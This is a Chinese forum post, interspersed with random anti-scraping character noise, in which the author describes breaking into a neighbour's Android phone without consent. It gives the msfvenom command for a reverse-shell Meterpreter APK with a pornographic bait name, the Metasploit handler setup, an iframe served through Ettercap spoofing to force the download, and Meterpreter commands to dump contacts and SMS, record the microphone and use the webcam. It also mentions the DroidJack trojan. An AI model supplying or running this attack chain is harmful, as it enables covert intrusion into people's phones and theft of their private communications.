metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

4 Z5 G @" I2 w& u/ Z 五、msf+ettercap入侵邻居安卓手机 6 Z V+ N4 w& r9 b. V$ q+ k" Z

: y; p d" X! d6 Q0 A; T4 ? 首先启动msf 0 w9 L5 K1 L$ I

4 V' n1 ~$ N5 _" R, \ 先用kali生成一个安卓木马，如下命令： 0 F5 w2 J5 n( R$ F& {

0 ^& _ H" Q8 f Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 8 ^7 D+ S# H8 v8 ?% ^" z1 h

6 j$ {: d Y$ h' u8 i! E$ ` 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 ' X, M" t, Y2 p, A% L' [$ ~; b0 N

w; t) w; O, }6 ?" B 然后进入msf * l7 D. H4 i7 N& l

, k* X$ c% V- F- e$ d" L use exploit/multi/handler ! e3 X7 p3 C$ y' d$ ~7 b2 t

; ?! D# V- {+ Z( v) N9 U7 Z set payload android/meterpreter/reverse_tcp ! r6 x5 A" |% X2 _4 v& ^

2 B" z4 m. m( j! e set LHOST 192.168.0.109 //ip为kaili的ip 7 E5 S# T2 B3 f3 D0 {

e! [( a S; m) x set LPORT 44444 //端口一定要与前面生成的木马的端口一致 3 W, j8 O& d! O# a9 n

/ @7 ^' Q5 ~- m& p. ~# Z Exploit + d2 m4 l% Q. _& j% ~+ @ G6 e

* T1 g" z3 h/ f1 ~: b" h, C. g % _+ q' U8 Q# c, \

0 j# d5 W* f7 [: |4 i 下面我们开启ettercap -G ) M) m U0 A; N. b! {& h; |

( F" s2 Q0 j" j7 K% C6 E0 F" U 我物理IP为 & F |: Y; L4 r; } S# b/ k# J

& L0 A* J3 l* n k 0 d- o, T* ^2 S1 w/ {% {, k, F

4 t! |9 L8 Z* {# E" P 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， + q% ?8 b6 Q9 w2 l! B0 t

/ q. x; E0 Q' B1 ]% Z) C( } 下面我们来设置一下 . O" L8 I9 v; U: A2 o

4 v( T- G# v. E2 C) W& T) k n$ B1 v6 K# v3 Q- E% W% _0 d/ }

& i3 S9 Q: [( I; c) g1 a 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， 7 P9 _ C1 I S) K! P3 V% w

7 D q1 Q( x* b* s , a' ?4 e& i* U5 V; }# G

* V1 @% Y# W& ~3 @$ x5 N3 Y' E8 x/ E 3 n, O% ]* I6 r: F; A9 _

! ?1 ]6 b9 X: K9 W 0 Y9 E8 B* K3 N: ~& y& X

8 y# L$ f; z# P; O! M 9 D8 H3 M$ e0 G5 f% j

5 @- n' a7 c+ _9 K) x* S : c1 B$ z5 @7 T% _

# C. A# W; u+ U ]4 S; Z7 B & O* g8 z$ M7 U9 `* e

0 Q7 z2 T; H3 q1 N f: R( v' H/ P3 z4 |# q

: I5 V- N% y: O( M% \( B0 i9 r6 E % x- E( J% I, S9 T* [, k

$ s: x9 K* x( Z% T . |. O) I! P+ i) C+ ~* w' B

9 Y& z' b9 X1 z$ J; ~ * G) |) R) l' n+ i8 D u8 Z2 c

0 D3 C/ r* q' X0 Y! k$ [3 v/ \+ | ; F$ s7 d8 h8 n: b% G/ |8 l6 X" K" c

4 P* t0 |) {7 N) b3 F% C , ~3 j4 M& F& H) k! V

8 ^/ F/ S+ {# }9 d. d1 `3 q$ p 1 x9 S4 Q. }8 }& {- N5 O( Q: t+ O" u

# @, r! S: }- x2 u7 l9 @: u 下面我们开始攻击 + \6 V& {' q' L7 R$ H9 C6 g$ ^

5 r1 |' h8 `+ a. B 8 K- T+ e" D2 B/ S& x8 s3 q

. \; d) m% g, H1 O 0 U Q( k0 T+ w' |1 Q

" J& |( V+ G6 ` a7 E8 L; G ( k/ [! Y6 q8 d. u) @- ?: @

$ a+ {# l3 q8 |4 S6 n+ M' k7 u * Q6 Q! K: d# W F) r, m

7 }3 { {# N: O, z 3 p( ] ]0 ?% B/ L$ q

; B9 ^& c& P C& @ 大概过了5分钟多，发现反弹成功了 . K& O9 b! J q# W7 p' w

' Y1 [- `. P5 \$ ?, P0 x) _2 a; W , @0 S3 m) K: I' n6 X$ Y

% `0 C) I" o$ L% x# P) { / F4 K1 q7 U/ G' D( l

$ T- Q/ \; F1 a$ N ( l% ]& b5 v. l( K& a$ M1 r7 @

# N* u# v* Q. t7 @ & ^$ ~. y0 w: A1 L

/ C6 z' {& n! t% s3 N 0 w- o8 a* l Z* u9 w3 z

0 N O6 K; F. S 6 l6 E/ r! w1 x0 `

/ [2 E- |8 ]# }: T( k $ D' l2 b z# n& P/ ~- A! t

, o) F; M2 ~ v 执行命令 ; Y: _# F1 G. @$ B/ A

- N7 V3 K! s2 P& R# c % V2 s* A9 b1 N/ ]. D# q

3 y; d# t. f6 D; ? dump_contacts --》这个是导出电话 , {* D$ H* I! P# ^" V% s. r

4 T! g- B: g# u8 Q- R dump_sms --》这个是导出信息 ' \' N3 z* `. W1 H

6 J% }7 i: {* n' y& P- t- r record_mic Record audio from the default microphone for X seconds 2 O+ O: ~, S6 E4 P: \3 }

7 t2 m6 @8 Q2 b$ k, p0 C* X webcam_chat Start a video chat 6 A( _2 D% h- |1 [8 m( {% h

) P; F, p6 J% w- P% a9 z webcam_list List webcams ; q ~& A& b" T: S+ K8 v( ]/ x: S

; h) X% O L% Q. {) R1 j% U6 M# O webcam_snap Take a snapshot from the specified webcam + o# \4 N" d, V

! s/ J8 w3 k- I/ x* |- W webcam_stream lay a video stream from the specified webcam * F! e, Y! N7 b

" R9 Q7 E! m+ Q& B 0 _% t& ]/ L' k5 v

# g1 s! \, @: e6 m0 M# X: ? 2 y4 N! c4 X9 S n& e4 [9 ?

; a, P" u X) i1 E" y% O2 a! Q. i7 i 我们打开看一下电话薄， 2 F8 d. U8 K' X6 }: {9 ]' p

- E. ~/ u2 z) P7 j8 D 9 t* _/ `9 b' s) D4 V9 _

7 N: V5 ~6 D4 k1 x1 h; I 6 f9 J9 j* q# K: V9 ?) V

$ K4 ]( D! J4 W z3 y" B0 J " r$ i; b% d/ |3 x. h; M# k* C" q: ^

7 ^+ ?7 L h' K. { 8 C0 v' Q0 a* X W- p: M

* C( r8 _% E" e8 ^5 L & t( u# x- F' Z

, Q& R) Z2 Y3 i1 w) I; w! Z 9 i% e# l6 ]9 t% i' z& y: `" ^! A

7 O2 T) b) w1 F; b 我们同时欺骗成DroidJack木马，使用方法如图： - i2 E/ L* v1 n% e- @4 @4 L

6 o. s8 O5 l: a/ j: v9 f 3 x- z2 J* @2 |/ B' l- f4 c0 x

) x( h& f8 _, k' ~5 J0 I 3 S1 }% G; N; L7 n/ l0 H0 W9 N

( f1 q9 a9 t7 \% C / m: l: F7 u s$ R0 ]5 W# r

. X# e L4 @" r7 m( |' Y4 y 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 ! s6 ?7 x& ?4 ?1 e# t( C y

5 _8 B( Z1 }0 h; O- v 4 t, ?# U) l% B8 {4 j' {2 K

2 i. V& a7 o2 O4 I3 G/ I 2 ^4 v3 U' x9 X: N6 G

( N: F: w# e( w- Y; M' ~8 x) ~& { * r6 q M! H) Y/ P

1 G3 X5 x2 A5 F% @: F, G 7 r) ]% S Q+ O; m

5 h# d" [! T2 u9 n4 _, I
+ z( z) M v: b

		自动登录	找回密码
密码			立即注册

metasploit+ettercap中间人攻击成功入侵邻居手机

浏览过的版块